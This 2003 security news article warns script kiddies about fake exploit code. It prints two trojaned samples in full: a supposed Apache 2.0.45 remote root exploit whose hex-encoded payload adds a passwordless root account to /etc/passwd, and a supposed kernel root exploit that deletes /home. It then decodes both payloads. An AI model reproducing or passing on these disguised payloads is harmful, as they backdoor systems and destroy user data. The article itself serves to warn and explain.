R o o t s e c u r e . n e t
The Security News Site For Systems Administrators & Hackers Sunday, 20th April 2014 @ 02:27:14 GMT 
Reports | Hackers Hack 'Script Kiddies'
{3rd May 2003}
Script kiddies, those that typically use existing well known exploits to gain unauthorized access to computer systems with little regard for the actual code and how it works, be warned - examine what you execute.

Most people realise, or quickly find out that downloading ‘31337 hax40r too1z' from sites on free web space is generally not such a good idea since more likely than not these programmes come with often destructive extras.  Now however those that blindly run code hoping to e.g. deface yet another supposedly vulnerable web server have another problem to consider, besides hiding their identity.  Does the code they downloaded really do what it says, or is it a convincing fake which actually adds say a new root account to the local system with no password.

The practice of producing such ‘exploit' code is certainly not wide spread, however does happen:

--- /*
Remote apache 2.0.45 root exploit (linux)

Some code taken from a old apache 1.3* expliot, author unknown.
Updated and fixed by WhiteRaven of Hackerhost.com

Due to the nature of the expliot you must be root
on the local box for this to work.

to compile:
gcc apache.c -o apache
*/

#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char shellcode[] = \
"\x65\x63\x68\x6f\x20\x72\x61\x76\x33\x6e\x3a\x3a\x30\x3a"
"\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x20"
"\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";

#define NOP 0x90
#define BSIZE 256
#define OFFSET 400
#define ADDR 0xbffff658
#define ASIZE 2000

int main(int argc, char *argv[])
{
char *buffer;
int s;
struct hostent *hp;
struct sockaddr_in sin;

if (argc != 2){
printf("Apache 2.0.45 Remote Expliot by WhiteRaven");
printf("%s <target>\n", argv[0]);
exit(1);
}

buffer = (char *)malloc(BSIZE + ASIZE + 100);

if (buffer == NULL) {
printf("Not enough memory! Exiting.\n");
exit(1);
}
memcpy(&buffer[BSIZE - strlen(shellcode)], shellcode, strlen(shellcode));
buffer[BSIZE + ASIZE] = ';';
buffer[BSIZE + ASIZE + 1] = '<!--POST BOX-->';

hp = gethostbyname(argv[1]);

if (hp == NULL) {
printf("No such target server. Exiting.\n");
exit(1);
}

bzero(&sin, sizeof(sin));
bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(80); /* Port 80 is HTTP */
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

if (s < 0) {
printf("Can't open socket, Exiting.\n");
exit(1);
}

if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
printf("Connection refused.\nIs the target running a webserver?\nExiting.\n");
exit(1);
}

printf("Sending exploit code...\n");
if (send(s, buffer, strlen(buffer), 0) != 1){
printf("exploit was successful!\n");
}else{
printf("Sorry, This target isn't vulnerable\n");
}

printf("Waiting for shell.....\n");
if (fork() == 0)
execl("/bin/sh", "sh", "-c", shellcode, 0);
else
wait(NULL);
while(1){
/* shell */
}
return 0;
}

--- /*
Proof of concept code!!
DO NOT DISTRIBUTE!

d4yj4y_at_yahoo.com

Get r00t on any Linux x86 system
With the below shellcode.

It uses an exploit in the linux
kernel to elevate privilages to root!
*/

char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20" "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61" "\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c" "\x68\x65\x68\x65";

main()
{
system(shellcode);
return 0;
}

Anyone running the above code proposing to be a zero day "Remote apache 2.0.45 root exploit" would find an extra root account on their system under the name rav3n with no password.  Decoding the hex characters (65 63 68 6f 20 72 61 76 33 6e 3a 3a 30 3a 30 3a 3a 2f 3a 2f 62 69 6e 2f 73 68 20 3e 3e 20 2f 65 74 63 2f 70 61 73 73 77 64) to ASCII reveals the command "echo rav3n::0:0::/:/bin/sh >> /etc/passwd" and translating the "Get r00t on any Linux x86 system" code shows, "/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe".

Programs such as these written by ‘hackers' who are increasingly getting frustrated with those that give them a bad name in the eyes of the media (by mindlessly attacking machines with the intent of causing damage), reopen the long running debate on whether systems administrators should have the right to disable machines attacking their networks.  This time however by proactive, rather than reactive means.

It should be noted the code is written with the hope that legitimate security professional would not run exploit code written in any language that they do not have at least a basic understanding in, otherwise the security profession will find it self coming under even greater attack.